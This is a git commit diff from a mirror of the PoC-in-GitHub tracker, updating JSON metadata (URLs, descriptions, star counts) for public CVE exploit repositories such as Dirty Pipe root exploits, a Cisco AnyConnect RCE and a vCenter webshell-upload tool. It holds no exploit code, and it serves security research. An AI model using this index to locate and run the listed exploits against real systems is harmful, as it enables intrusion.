mirror of
https://github.com/nomi-sec/PoC-in-GitHub.git
synced 2025-01-15 20:32:21 +01:00
Auto Update 2023/08/24 13:55:33
This commit is contained in:
parent
53543bb0fb
commit
93c56051c8
64 changed files with 223 additions and 1361 deletions
|
@ -148,5 +148,35 @@
|
|||
"watchers": 3,
|
||||
"score": 0,
|
||||
"subscribers_count": 1
|
||||
},
|
||||
{
|
||||
"id": 682528565,
|
||||
"name": "CVE-2012-1823",
|
||||
"full_name": "0xl0k1\/CVE-2012-1823",
|
||||
"owner": {
|
||||
"login": "0xl0k1",
|
||||
"id": 141760484,
|
||||
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/141760484?v=4",
|
||||
"html_url": "https:\/\/github.com\/0xl0k1"
|
||||
},
|
||||
"html_url": "https:\/\/github.com\/0xl0k1\/CVE-2012-1823",
|
||||
"description": "PHP CGI Argument Injection.",
|
||||
"fork": false,
|
||||
"created_at": "2023-08-24T11:17:51Z",
|
||||
"updated_at": "2023-08-24T11:52:52Z",
|
||||
"pushed_at": "2023-08-24T11:56:38Z",
|
||||
"stargazers_count": 0,
|
||||
"watchers_count": 0,
|
||||
"has_discussions": false,
|
||||
"forks_count": 0,
|
||||
"allow_forking": true,
|
||||
"is_template": false,
|
||||
"web_commit_signoff_required": false,
|
||||
"topics": [],
|
||||
"visibility": "public",
|
||||
"forks": 0,
|
||||
"watchers": 0,
|
||||
"score": 0,
|
||||
"subscribers_count": 0
|
||||
}
|
||||
]
|
|
@ -1158,10 +1158,10 @@
|
|||
"description": "Shellshock exploit + vulnerable environment",
|
||||
"fork": false,
|
||||
"created_at": "2016-12-07T23:38:50Z",
|
||||
"updated_at": "2023-08-21T02:54:09Z",
|
||||
"updated_at": "2023-08-24T10:35:27Z",
|
||||
"pushed_at": "2023-05-11T02:12:25Z",
|
||||
"stargazers_count": 165,
|
||||
"watchers_count": 165,
|
||||
"stargazers_count": 166,
|
||||
"watchers_count": 166,
|
||||
"has_discussions": false,
|
||||
"forks_count": 58,
|
||||
"allow_forking": true,
|
||||
|
@ -1177,7 +1177,7 @@
|
|||
],
|
||||
"visibility": "public",
|
||||
"forks": 58,
|
||||
"watchers": 165,
|
||||
"watchers": 166,
|
||||
"score": 0,
|
||||
"subscribers_count": 5
|
||||
},
|
||||
|
|
|
@ -1145,10 +1145,10 @@
|
|||
"description": "CVE-2022-0847-DirtyPipe-Exploit CVE-2022-0847 是存在于 Linux内核 5.8 及之后版本中的本地提权漏洞。攻击者通过利用此漏洞,可覆盖重写任意可读文件中的数据,从而可将普通权限的用户提升到特权 root。 CVE-2022-0847 的漏洞原理类似于 CVE-2016-5195 脏牛漏洞(Dirty Cow),但它更容易被利用。漏洞作者将此漏洞命名为“Dirty Pipe”",
|
||||
"fork": false,
|
||||
"created_at": "2022-03-07T18:36:50Z",
|
||||
"updated_at": "2023-08-23T01:48:48Z",
|
||||
"updated_at": "2023-08-24T08:15:54Z",
|
||||
"pushed_at": "2023-02-02T02:17:30Z",
|
||||
"stargazers_count": 255,
|
||||
"watchers_count": 255,
|
||||
"stargazers_count": 256,
|
||||
"watchers_count": 256,
|
||||
"has_discussions": false,
|
||||
"forks_count": 74,
|
||||
"allow_forking": true,
|
||||
|
@ -1157,7 +1157,7 @@
|
|||
"topics": [],
|
||||
"visibility": "public",
|
||||
"forks": 74,
|
||||
"watchers": 255,
|
||||
"watchers": 256,
|
||||
"score": 0,
|
||||
"subscribers_count": 4
|
||||
},
|
||||
|
|
|
@ -13,10 +13,10 @@
|
|||
"description": "Proof of concept for CVE-2016-9192.",
|
||||
"fork": false,
|
||||
"created_at": "2016-12-20T18:32:53Z",
|
||||
"updated_at": "2023-01-22T17:32:31Z",
|
||||
"updated_at": "2023-08-24T06:19:46Z",
|
||||
"pushed_at": "2023-01-28T11:29:16Z",
|
||||
"stargazers_count": 6,
|
||||
"watchers_count": 6,
|
||||
"stargazers_count": 5,
|
||||
"watchers_count": 5,
|
||||
"has_discussions": false,
|
||||
"forks_count": 1,
|
||||
"allow_forking": true,
|
||||
|
@ -29,7 +29,7 @@
|
|||
],
|
||||
"visibility": "public",
|
||||
"forks": 1,
|
||||
"watchers": 6,
|
||||
"watchers": 5,
|
||||
"score": 0,
|
||||
"subscribers_count": 2
|
||||
}
|
||||
|
|
|
@ -73,10 +73,10 @@
|
|||
"description": "Unsigned driver loader using CVE-2018-19320",
|
||||
"fork": false,
|
||||
"created_at": "2022-11-12T05:48:13Z",
|
||||
"updated_at": "2023-08-12T12:30:58Z",
|
||||
"updated_at": "2023-08-24T11:34:41Z",
|
||||
"pushed_at": "2023-04-09T13:50:29Z",
|
||||
"stargazers_count": 83,
|
||||
"watchers_count": 83,
|
||||
"stargazers_count": 84,
|
||||
"watchers_count": 84,
|
||||
"has_discussions": false,
|
||||
"forks_count": 26,
|
||||
"allow_forking": true,
|
||||
|
@ -85,7 +85,7 @@
|
|||
"topics": [],
|
||||
"visibility": "public",
|
||||
"forks": 26,
|
||||
"watchers": 83,
|
||||
"watchers": 84,
|
||||
"score": 0,
|
||||
"subscribers_count": 4
|
||||
},
|
||||
|
|
|
@ -2464,10 +2464,10 @@
|
|||
"description": "Public work for CVE-2019-0708",
|
||||
"fork": false,
|
||||
"created_at": "2019-07-23T03:15:53Z",
|
||||
"updated_at": "2023-08-04T20:23:04Z",
|
||||
"updated_at": "2023-08-24T12:21:49Z",
|
||||
"pushed_at": "2019-11-19T02:43:38Z",
|
||||
"stargazers_count": 294,
|
||||
"watchers_count": 294,
|
||||
"stargazers_count": 293,
|
||||
"watchers_count": 293,
|
||||
"has_discussions": false,
|
||||
"forks_count": 98,
|
||||
"allow_forking": true,
|
||||
|
@ -2476,7 +2476,7 @@
|
|||
"topics": [],
|
||||
"visibility": "public",
|
||||
"forks": 98,
|
||||
"watchers": 294,
|
||||
"watchers": 293,
|
||||
"score": 0,
|
||||
"subscribers_count": 21
|
||||
},
|
||||
|
|
|
@ -48,7 +48,7 @@
|
|||
"stargazers_count": 301,
|
||||
"watchers_count": 301,
|
||||
"has_discussions": false,
|
||||
"forks_count": 92,
|
||||
"forks_count": 93,
|
||||
"allow_forking": true,
|
||||
"is_template": false,
|
||||
"web_commit_signoff_required": false,
|
||||
|
@ -65,7 +65,7 @@
|
|||
"security-1266"
|
||||
],
|
||||
"visibility": "public",
|
||||
"forks": 92,
|
||||
"forks": 93,
|
||||
"watchers": 301,
|
||||
"score": 0,
|
||||
"subscribers_count": 4
|
||||
|
|
|
@ -43,10 +43,10 @@
|
|||
"description": "Exphub[漏洞利用脚本库] 包括Webloigc、Struts2、Tomcat、Nexus、Solr、Jboss、Drupal的漏洞利用脚本,最新添加CVE-2020-14882、CVE-2020-11444、CVE-2020-10204、CVE-2020-10199、CVE-2020-1938、CVE-2020-2551、CVE-2020-2555、CVE-2020-2883、CVE-2019-17558、CVE-2019-6340",
|
||||
"fork": false,
|
||||
"created_at": "2020-04-01T09:33:35Z",
|
||||
"updated_at": "2023-08-23T08:43:28Z",
|
||||
"updated_at": "2023-08-24T08:25:12Z",
|
||||
"pushed_at": "2021-04-04T09:13:57Z",
|
||||
"stargazers_count": 3852,
|
||||
"watchers_count": 3852,
|
||||
"stargazers_count": 3851,
|
||||
"watchers_count": 3851,
|
||||
"has_discussions": false,
|
||||
"forks_count": 1085,
|
||||
"allow_forking": true,
|
||||
|
@ -75,7 +75,7 @@
|
|||
],
|
||||
"visibility": "public",
|
||||
"forks": 1085,
|
||||
"watchers": 3852,
|
||||
"watchers": 3851,
|
||||
"score": 0,
|
||||
"subscribers_count": 155
|
||||
},
|
||||
|
|
|
@ -569,10 +569,10 @@
|
|||
"description": "CVE-2020-0601 #curveball - Alternative Key Calculator",
|
||||
"fork": false,
|
||||
"created_at": "2020-01-20T16:24:20Z",
|
||||
"updated_at": "2023-07-27T16:11:14Z",
|
||||
"updated_at": "2023-08-24T08:37:36Z",
|
||||
"pushed_at": "2020-01-20T23:00:14Z",
|
||||
"stargazers_count": 75,
|
||||
"watchers_count": 75,
|
||||
"stargazers_count": 74,
|
||||
"watchers_count": 74,
|
||||
"has_discussions": false,
|
||||
"forks_count": 16,
|
||||
"allow_forking": true,
|
||||
|
@ -581,7 +581,7 @@
|
|||
"topics": [],
|
||||
"visibility": "public",
|
||||
"forks": 16,
|
||||
"watchers": 75,
|
||||
"watchers": 74,
|
||||
"score": 0,
|
||||
"subscribers_count": 5
|
||||
},
|
||||
|
|
|
@ -265,10 +265,10 @@
|
|||
"description": "Exploit and detect tools for CVE-2020-0688",
|
||||
"fork": false,
|
||||
"created_at": "2020-03-01T12:57:32Z",
|
||||
"updated_at": "2023-08-07T08:21:03Z",
|
||||
"updated_at": "2023-08-24T11:59:33Z",
|
||||
"pushed_at": "2020-03-21T05:44:48Z",
|
||||
"stargazers_count": 341,
|
||||
"watchers_count": 341,
|
||||
"stargazers_count": 340,
|
||||
"watchers_count": 340,
|
||||
"has_discussions": false,
|
||||
"forks_count": 79,
|
||||
"allow_forking": true,
|
||||
|
@ -277,7 +277,7 @@
|
|||
"topics": [],
|
||||
"visibility": "public",
|
||||
"forks": 79,
|
||||
"watchers": 341,
|
||||
"watchers": 340,
|
||||
"score": 0,
|
||||
"subscribers_count": 11
|
||||
},
|
||||
|
|
|
@ -133,10 +133,10 @@
|
|||
"description": "Scanner for CVE-2020-0796 - SMBv3 RCE",
|
||||
"fork": false,
|
||||
"created_at": "2020-03-11T15:21:27Z",
|
||||
"updated_at": "2023-08-17T15:12:49Z",
|
||||
"updated_at": "2023-08-24T10:21:12Z",
|
||||
"pushed_at": "2020-10-01T08:36:29Z",
|
||||
"stargazers_count": 643,
|
||||
"watchers_count": 643,
|
||||
"stargazers_count": 644,
|
||||
"watchers_count": 644,
|
||||
"has_discussions": false,
|
||||
"forks_count": 205,
|
||||
"allow_forking": true,
|
||||
|
@ -147,7 +147,7 @@
|
|||
],
|
||||
"visibility": "public",
|
||||
"forks": 205,
|
||||
"watchers": 643,
|
||||
"watchers": 644,
|
||||
"score": 0,
|
||||
"subscribers_count": 27
|
||||
},
|
||||
|
|
|
@ -13,10 +13,10 @@
|
|||
"description": "Exphub[漏洞利用脚本库] 包括Webloigc、Struts2、Tomcat、Nexus、Solr、Jboss、Drupal的漏洞利用脚本,最新添加CVE-2020-14882、CVE-2020-11444、CVE-2020-10204、CVE-2020-10199、CVE-2020-1938、CVE-2020-2551、CVE-2020-2555、CVE-2020-2883、CVE-2019-17558、CVE-2019-6340",
|
||||
"fork": false,
|
||||
"created_at": "2020-04-01T09:33:35Z",
|
||||
"updated_at": "2023-08-23T08:43:28Z",
|
||||
"updated_at": "2023-08-24T08:25:12Z",
|
||||
"pushed_at": "2021-04-04T09:13:57Z",
|
||||
"stargazers_count": 3852,
|
||||
"watchers_count": 3852,
|
||||
"stargazers_count": 3851,
|
||||
"watchers_count": 3851,
|
||||
"has_discussions": false,
|
||||
"forks_count": 1085,
|
||||
"allow_forking": true,
|
||||
|
@ -45,7 +45,7 @@
|
|||
],
|
||||
"visibility": "public",
|
||||
"forks": 1085,
|
||||
"watchers": 3852,
|
||||
"watchers": 3851,
|
||||
"score": 0,
|
||||
"subscribers_count": 155
|
||||
},
|
||||
|
|
|
@ -74,7 +74,7 @@
|
|||
"fork": false,
|
||||
"created_at": "2022-04-27T05:01:30Z",
|
||||
"updated_at": "2022-04-27T05:22:34Z",
|
||||
"pushed_at": "2022-04-27T05:22:40Z",
|
||||
"pushed_at": "2023-08-24T10:29:55Z",
|
||||
"stargazers_count": 0,
|
||||
"watchers_count": 0,
|
||||
"has_discussions": false,
|
||||
|
|
|
@ -851,10 +851,10 @@
|
|||
"description": "一款针对Vcenter的综合利用工具,包含目前最主流的CVE-2021-21972、CVE-2021-21985以及CVE-2021-22005、One Access的CVE-2022-22954、CVE-2022-22972\/31656以及log4j,提供一键上传webshell,命令执行或者上传公钥使用SSH免密连接",
|
||||
"fork": false,
|
||||
"created_at": "2022-10-04T03:39:27Z",
|
||||
"updated_at": "2023-08-24T03:37:41Z",
|
||||
"updated_at": "2023-08-24T13:39:58Z",
|
||||
"pushed_at": "2023-05-14T12:08:39Z",
|
||||
"stargazers_count": 1055,
|
||||
"watchers_count": 1055,
|
||||
"stargazers_count": 1057,
|
||||
"watchers_count": 1057,
|
||||
"has_discussions": false,
|
||||
"forks_count": 131,
|
||||
"allow_forking": true,
|
||||
|
@ -870,7 +870,7 @@
|
|||
],
|
||||
"visibility": "public",
|
||||
"forks": 131,
|
||||
"watchers": 1055,
|
||||
"watchers": 1057,
|
||||
"score": 0,
|
||||
"subscribers_count": 10
|
||||
}
|
||||
|
|
|
@ -283,10 +283,10 @@
|
|||
"description": null,
|
||||
"fork": false,
|
||||
"created_at": "2021-12-18T08:18:50Z",
|
||||
"updated_at": "2023-08-19T14:21:26Z",
|
||||
"updated_at": "2023-08-24T06:32:53Z",
|
||||
"pushed_at": "2021-12-22T10:32:37Z",
|
||||
"stargazers_count": 167,
|
||||
"watchers_count": 167,
|
||||
"stargazers_count": 168,
|
||||
"watchers_count": 168,
|
||||
"has_discussions": false,
|
||||
"forks_count": 46,
|
||||
"allow_forking": true,
|
||||
|
@ -295,7 +295,7 @@
|
|||
"topics": [],
|
||||
"visibility": "public",
|
||||
"forks": 46,
|
||||
"watchers": 167,
|
||||
"watchers": 168,
|
||||
"score": 0,
|
||||
"subscribers_count": 5
|
||||
},
|
||||
|
|
|
@ -142,10 +142,10 @@
|
|||
"description": null,
|
||||
"fork": false,
|
||||
"created_at": "2021-06-14T20:08:20Z",
|
||||
"updated_at": "2023-08-21T01:40:24Z",
|
||||
"updated_at": "2023-08-24T09:30:03Z",
|
||||
"pushed_at": "2022-11-16T13:14:56Z",
|
||||
"stargazers_count": 100,
|
||||
"watchers_count": 100,
|
||||
"stargazers_count": 101,
|
||||
"watchers_count": 101,
|
||||
"has_discussions": false,
|
||||
"forks_count": 52,
|
||||
"allow_forking": true,
|
||||
|
@ -154,7 +154,7 @@
|
|||
"topics": [],
|
||||
"visibility": "public",
|
||||
"forks": 52,
|
||||
"watchers": 100,
|
||||
"watchers": 101,
|
||||
"score": 0,
|
||||
"subscribers_count": 2
|
||||
},
|
||||
|
|
|
@ -84,13 +84,13 @@
|
|||
"stargazers_count": 1844,
|
||||
"watchers_count": 1844,
|
||||
"has_discussions": false,
|
||||
"forks_count": 515,
|
||||
"forks_count": 514,
|
||||
"allow_forking": true,
|
||||
"is_template": false,
|
||||
"web_commit_signoff_required": false,
|
||||
"topics": [],
|
||||
"visibility": "public",
|
||||
"forks": 515,
|
||||
"forks": 514,
|
||||
"watchers": 1844,
|
||||
"score": 0,
|
||||
"subscribers_count": 22
|
||||
|
|
|
@ -163,10 +163,10 @@
|
|||
"description": "Apache forward request CVE",
|
||||
"fork": false,
|
||||
"created_at": "2022-04-03T15:24:24Z",
|
||||
"updated_at": "2023-08-19T15:31:06Z",
|
||||
"updated_at": "2023-08-24T12:05:35Z",
|
||||
"pushed_at": "2022-04-03T18:34:35Z",
|
||||
"stargazers_count": 7,
|
||||
"watchers_count": 7,
|
||||
"stargazers_count": 8,
|
||||
"watchers_count": 8,
|
||||
"has_discussions": false,
|
||||
"forks_count": 0,
|
||||
"allow_forking": true,
|
||||
|
@ -175,7 +175,7 @@
|
|||
"topics": [],
|
||||
"visibility": "public",
|
||||
"forks": 0,
|
||||
"watchers": 7,
|
||||
"watchers": 8,
|
||||
"score": 0,
|
||||
"subscribers_count": 2
|
||||
},
|
||||
|
|
|
@ -73,10 +73,10 @@
|
|||
"description": "Grafana Unauthorized arbitrary file reading vulnerability",
|
||||
"fork": false,
|
||||
"created_at": "2021-12-07T09:02:16Z",
|
||||
"updated_at": "2023-08-09T17:37:38Z",
|
||||
"updated_at": "2023-08-24T08:24:08Z",
|
||||
"pushed_at": "2023-02-14T07:05:22Z",
|
||||
"stargazers_count": 332,
|
||||
"watchers_count": 332,
|
||||
"stargazers_count": 333,
|
||||
"watchers_count": 333,
|
||||
"has_discussions": false,
|
||||
"forks_count": 90,
|
||||
"allow_forking": true,
|
||||
|
@ -85,7 +85,7 @@
|
|||
"topics": [],
|
||||
"visibility": "public",
|
||||
"forks": 90,
|
||||
"watchers": 332,
|
||||
"watchers": 333,
|
||||
"score": 0,
|
||||
"subscribers_count": 7
|
||||
},
|
||||
|
|
|
@ -3708,13 +3708,13 @@
|
|||
"stargazers_count": 3284,
|
||||
"watchers_count": 3284,
|
||||
"has_discussions": true,
|
||||
"forks_count": 744,
|
||||
"forks_count": 745,
|
||||
"allow_forking": true,
|
||||
"is_template": false,
|
||||
"web_commit_signoff_required": false,
|
||||
"topics": [],
|
||||
"visibility": "public",
|
||||
"forks": 744,
|
||||
"forks": 745,
|
||||
"watchers": 3284,
|
||||
"score": 0,
|
||||
"subscribers_count": 60
|
||||
|
|
|
@ -29,66 +29,6 @@
|
|||
"score": 0,
|
||||
"subscribers_count": 39
|
||||
},
|
||||
{
|
||||
"id": 452351785,
|
||||
"name": "cve-2022-0185-crash-poc",
|
||||
"full_name": "discordianfish\/cve-2022-0185-crash-poc",
|
||||
"owner": {
|
||||
"login": "discordianfish",
|
||||
"id": 275966,
|
||||
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/275966?v=4",
|
||||
"html_url": "https:\/\/github.com\/discordianfish"
|
||||
},
|
||||
"html_url": "https:\/\/github.com\/discordianfish\/cve-2022-0185-crash-poc",
|
||||
"description": null,
|
||||
"fork": false,
|
||||
"created_at": "2022-01-26T16:27:50Z",
|
||||
"updated_at": "2022-06-21T02:30:36Z",
|
||||
"pushed_at": "2022-01-26T16:45:45Z",
|
||||
"stargazers_count": 6,
|
||||
"watchers_count": 6,
|
||||
"has_discussions": false,
|
||||
"forks_count": 1,
|
||||
"allow_forking": true,
|
||||
"is_template": false,
|
||||
"web_commit_signoff_required": false,
|
||||
"topics": [],
|
||||
"visibility": "public",
|
||||
"forks": 1,
|
||||
"watchers": 6,
|
||||
"score": 0,
|
||||
"subscribers_count": 2
|
||||
},
|
||||
{
|
||||
"id": 452756684,
|
||||
"name": "CVE-2022-0185",
|
||||
"full_name": "khaclep007\/CVE-2022-0185",
|
||||
"owner": {
|
||||
"login": "khaclep007",
|
||||
"id": 45098044,
|
||||
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45098044?v=4",
|
||||
"html_url": "https:\/\/github.com\/khaclep007"
|
||||
},
|
||||
"html_url": "https:\/\/github.com\/khaclep007\/CVE-2022-0185",
|
||||
"description": null,
|
||||
"fork": false,
|
||||
"created_at": "2022-01-27T16:24:35Z",
|
||||
"updated_at": "2022-01-27T16:25:54Z",
|
||||
"pushed_at": "2022-01-27T16:25:51Z",
|
||||
"stargazers_count": 0,
|
||||
"watchers_count": 0,
|
||||
"has_discussions": false,
|
||||
"forks_count": 0,
|
||||
"allow_forking": true,
|
||||
"is_template": false,
|
||||
"web_commit_signoff_required": false,
|
||||
"topics": [],
|
||||
"visibility": "public",
|
||||
"forks": 0,
|
||||
"watchers": 0,
|
||||
"score": 0,
|
||||
"subscribers_count": 1
|
||||
},
|
||||
{
|
||||
"id": 460788495,
|
||||
"name": "CVE-2022-0185",
|
||||
|
|
|
@ -1,32 +0,0 @@
|
|||
[
|
||||
{
|
||||
"id": 450128440,
|
||||
"name": "CVE-2022-0219",
|
||||
"full_name": "Haxatron\/CVE-2022-0219",
|
||||
"owner": {
|
||||
"login": "Haxatron",
|
||||
"id": 76475453,
|
||||
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76475453?v=4",
|
||||
"html_url": "https:\/\/github.com\/Haxatron"
|
||||
},
|
||||
"html_url": "https:\/\/github.com\/Haxatron\/CVE-2022-0219",
|
||||
"description": null,
|
||||
"fork": false,
|
||||
"created_at": "2022-01-20T14:24:45Z",
|
||||
"updated_at": "2022-01-20T14:24:45Z",
|
||||
"pushed_at": "2022-01-20T14:35:00Z",
|
||||
"stargazers_count": 0,
|
||||
"watchers_count": 0,
|
||||
"has_discussions": false,
|
||||
"forks_count": 0,
|
||||
"allow_forking": true,
|
||||
"is_template": false,
|
||||
"web_commit_signoff_required": false,
|
||||
"topics": [],
|
||||
"visibility": "public",
|
||||
"forks": 0,
|
||||
"watchers": 0,
|
||||
"score": 0,
|
||||
"subscribers_count": 1
|
||||
}
|
||||
]
|
|
@ -1,64 +0,0 @@
|
|||
[
|
||||
{
|
||||
"id": 448514056,
|
||||
"name": "CVE-2022-0236",
|
||||
"full_name": "qurbat\/CVE-2022-0236",
|
||||
"owner": {
|
||||
"login": "qurbat",
|
||||
"id": 37518297,
|
||||
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37518297?v=4",
|
||||
"html_url": "https:\/\/github.com\/qurbat"
|
||||
},
|
||||
"html_url": "https:\/\/github.com\/qurbat\/CVE-2022-0236",
|
||||
"description": "Proof of concept for unauthenticated sensitive data disclosure affecting the wp-import-export WordPress plugin (CVE-2022-0236)",
|
||||
"fork": false,
|
||||
"created_at": "2022-01-16T09:52:28Z",
|
||||
"updated_at": "2023-01-28T03:56:57Z",
|
||||
"pushed_at": "2022-01-18T17:14:53Z",
|
||||
"stargazers_count": 3,
|
||||
"watchers_count": 3,
|
||||
"has_discussions": false,
|
||||
"forks_count": 2,
|
||||
"allow_forking": true,
|
||||
"is_template": false,
|
||||
"web_commit_signoff_required": false,
|
||||
"topics": [
|
||||
"wordpress-security"
|
||||
],
|
||||
"visibility": "public",
|
||||
"forks": 2,
|
||||
"watchers": 3,
|
||||
"score": 0,
|
||||
"subscribers_count": 1
|
||||
},
|
||||
{
|
||||
"id": 448893968,
|
||||
"name": "CVE-2022-0236",
|
||||
"full_name": "xiska62314\/CVE-2022-0236",
|
||||
"owner": {
|
||||
"login": "xiska62314",
|
||||
"id": 97891523,
|
||||
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97891523?v=4",
|
||||
"html_url": "https:\/\/github.com\/xiska62314"
|
||||
},
|
||||
"html_url": "https:\/\/github.com\/xiska62314\/CVE-2022-0236",
|
||||
"description": "CVE-2022-0236",
|
||||
"fork": false,
|
||||
"created_at": "2022-01-17T12:56:19Z",
|
||||
"updated_at": "2022-01-17T12:56:19Z",
|
||||
"pushed_at": "2022-01-17T12:56:20Z",
|
||||
"stargazers_count": 0,
|
||||
"watchers_count": 0,
|
||||
"has_discussions": false,
|
||||
"forks_count": 0,
|
||||
"allow_forking": true,
|
||||
"is_template": false,
|
||||
"web_commit_signoff_required": false,
|
||||
"topics": [],
|
||||
"visibility": "public",
|
||||
"forks": 0,
|
||||
"watchers": 0,
|
||||
"score": 0,
|
||||
"subscribers_count": 1
|
||||
}
|
||||
]
|
|
@ -1,32 +0,0 @@
|
|||
[
|
||||
{
|
||||
"id": 452082369,
|
||||
"name": "CVE-2022-0332",
|
||||
"full_name": "numanturle\/CVE-2022-0332",
|
||||
"owner": {
|
||||
"login": "numanturle",
|
||||
"id": 7007951,
|
||||
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7007951?v=4",
|
||||
"html_url": "https:\/\/github.com\/numanturle"
|
||||
},
|
||||
"html_url": "https:\/\/github.com\/numanturle\/CVE-2022-0332",
|
||||
"description": null,
|
||||
"fork": false,
|
||||
"created_at": "2022-01-25T23:58:17Z",
|
||||
"updated_at": "2023-08-13T21:39:29Z",
|
||||
"pushed_at": "2022-01-26T00:18:26Z",
|
||||
"stargazers_count": 42,
|
||||
"watchers_count": 42,
|
||||
"has_discussions": false,
|
||||
"forks_count": 11,
|
||||
"allow_forking": true,
|
||||
"is_template": false,
|
||||
"web_commit_signoff_required": false,
|
||||
"topics": [],
|
||||
"visibility": "public",
|
||||
"forks": 11,
|
||||
"watchers": 42,
|
||||
"score": 0,
|
||||
"subscribers_count": 3
|
||||
}
|
||||
]
|
|
@ -103,10 +103,10 @@
|
|||
"description": "CVE-2022-0847-DirtyPipe-Exploit CVE-2022-0847 是存在于 Linux内核 5.8 及之后版本中的本地提权漏洞。攻击者通过利用此漏洞,可覆盖重写任意可读文件中的数据,从而可将普通权限的用户提升到特权 root。 CVE-2022-0847 的漏洞原理类似于 CVE-2016-5195 脏牛漏洞(Dirty Cow),但它更容易被利用。漏洞作者将此漏洞命名为“Dirty Pipe”",
|
||||
"fork": false,
|
||||
"created_at": "2022-03-07T18:36:50Z",
|
||||
"updated_at": "2023-08-23T01:48:48Z",
|
||||
"updated_at": "2023-08-24T08:15:54Z",
|
||||
"pushed_at": "2023-02-02T02:17:30Z",
|
||||
"stargazers_count": 255,
|
||||
"watchers_count": 255,
|
||||
"stargazers_count": 256,
|
||||
"watchers_count": 256,
|
||||
"has_discussions": false,
|
||||
"forks_count": 74,
|
||||
"allow_forking": true,
|
||||
|
@ -115,7 +115,7 @@
|
|||
"topics": [],
|
||||
"visibility": "public",
|
||||
"forks": 74,
|
||||
"watchers": 255,
|
||||
"watchers": 256,
|
||||
"score": 0,
|
||||
"subscribers_count": 4
|
||||
},
|
||||
|
@ -133,10 +133,10 @@
|
|||
"description": "A root exploit for CVE-2022-0847 (Dirty Pipe)",
|
||||
"fork": false,
|
||||
"created_at": "2022-03-07T18:55:20Z",
|
||||
"updated_at": "2023-08-16T13:09:57Z",
|
||||
"updated_at": "2023-08-24T07:08:59Z",
|
||||
"pushed_at": "2022-03-08T06:20:05Z",
|
||||
"stargazers_count": 1048,
|
||||
"watchers_count": 1048,
|
||||
"stargazers_count": 1049,
|
||||
"watchers_count": 1049,
|
||||
"has_discussions": false,
|
||||
"forks_count": 221,
|
||||
"allow_forking": true,
|
||||
|
@ -145,7 +145,7 @@
|
|||
"topics": [],
|
||||
"visibility": "public",
|
||||
"forks": 221,
|
||||
"watchers": 1048,
|
||||
"watchers": 1049,
|
||||
"score": 0,
|
||||
"subscribers_count": 17
|
||||
},
|
||||
|
|
|
@ -1,92 +0,0 @@
|
|||
[
|
||||
{
|
||||
"id": 456573106,
|
||||
"name": "CVE-2022-20699",
|
||||
"full_name": "Audiobahn\/CVE-2022-20699",
|
||||
"owner": {
|
||||
"login": "Audiobahn",
|
||||
"id": 98435709,
|
||||
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98435709?v=4",
|
||||
"html_url": "https:\/\/github.com\/Audiobahn"
|
||||
},
|
||||
"html_url": "https:\/\/github.com\/Audiobahn\/CVE-2022-20699",
|
||||
"description": "Cisco Anyconnect VPN unauth RCE (rwx stack)",
|
||||
"fork": false,
|
||||
"created_at": "2022-02-07T15:53:21Z",
|
||||
"updated_at": "2023-08-05T20:25:31Z",
|
||||
"pushed_at": "2022-02-07T15:55:03Z",
|
||||
"stargazers_count": 239,
|
||||
"watchers_count": 239,
|
||||
"has_discussions": false,
|
||||
"forks_count": 44,
|
||||
"allow_forking": true,
|
||||
"is_template": false,
|
||||
"web_commit_signoff_required": false,
|
||||
"topics": [],
|
||||
"visibility": "public",
|
||||
"forks": 44,
|
||||
"watchers": 239,
|
||||
"score": 0,
|
||||
"subscribers_count": 12
|
||||
},
|
||||
{
|
||||
"id": 457817909,
|
||||
"name": "CVE-2022-20699",
|
||||
"full_name": "puckiestyle\/CVE-2022-20699",
|
||||
"owner": {
|
||||
"login": "puckiestyle",
|
||||
"id": 57447087,
|
||||
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57447087?v=4",
|
||||
"html_url": "https:\/\/github.com\/puckiestyle"
|
||||
},
|
||||
"html_url": "https:\/\/github.com\/puckiestyle\/CVE-2022-20699",
|
||||
"description": null,
|
||||
"fork": false,
|
||||
"created_at": "2022-02-10T14:40:25Z",
|
||||
"updated_at": "2022-02-10T14:40:40Z",
|
||||
"pushed_at": "2022-02-10T14:40:37Z",
|
||||
"stargazers_count": 0,
|
||||
"watchers_count": 0,
|
||||
"has_discussions": false,
|
||||
"forks_count": 0,
|
||||
"allow_forking": true,
|
||||
"is_template": false,
|
||||
"web_commit_signoff_required": false,
|
||||
"topics": [],
|
||||
"visibility": "public",
|
||||
"forks": 0,
|
||||
"watchers": 0,
|
||||
"score": 0,
|
||||
"subscribers_count": 1
|
||||
},
|
||||
{
|
||||
"id": 459040811,
|
||||
"name": "CVE-2022-20699",
|
||||
"full_name": "rohankumardubey\/CVE-2022-20699",
|
||||
"owner": {
|
||||
"login": "rohankumardubey",
|
||||
"id": 82864904,
|
||||
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/82864904?v=4",
|
||||
"html_url": "https:\/\/github.com\/rohankumardubey"
|
||||
},
|
||||
"html_url": "https:\/\/github.com\/rohankumardubey\/CVE-2022-20699",
|
||||
"description": null,
|
||||
"fork": false,
|
||||
"created_at": "2022-02-14T06:23:06Z",
|
||||
"updated_at": "2022-11-05T15:57:52Z",
|
||||
"pushed_at": "2022-02-14T06:23:14Z",
|
||||
"stargazers_count": 4,
|
||||
"watchers_count": 4,
|
||||
"has_discussions": false,
|
||||
"forks_count": 1,
|
||||
"allow_forking": true,
|
||||
"is_template": false,
|
||||
"web_commit_signoff_required": false,
|
||||
"topics": [],
|
||||
"visibility": "public",
|
||||
"forks": 1,
|
||||
"watchers": 4,
|
||||
"score": 0,
|
||||
"subscribers_count": 1
|
||||
}
|
||||
]
|
|
@ -1,37 +0,0 @@
|
|||
[
|
||||
{
|
||||
"id": 379108906,
|
||||
"name": "csv-plus_vulnerability",
|
||||
"full_name": "satoki\/csv-plus_vulnerability",
|
||||
"owner": {
|
||||
"login": "satoki",
|
||||
"id": 54702093,
|
||||
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54702093?v=4",
|
||||
"html_url": "https:\/\/github.com\/satoki"
|
||||
},
|
||||
"html_url": "https:\/\/github.com\/satoki\/csv-plus_vulnerability",
|
||||
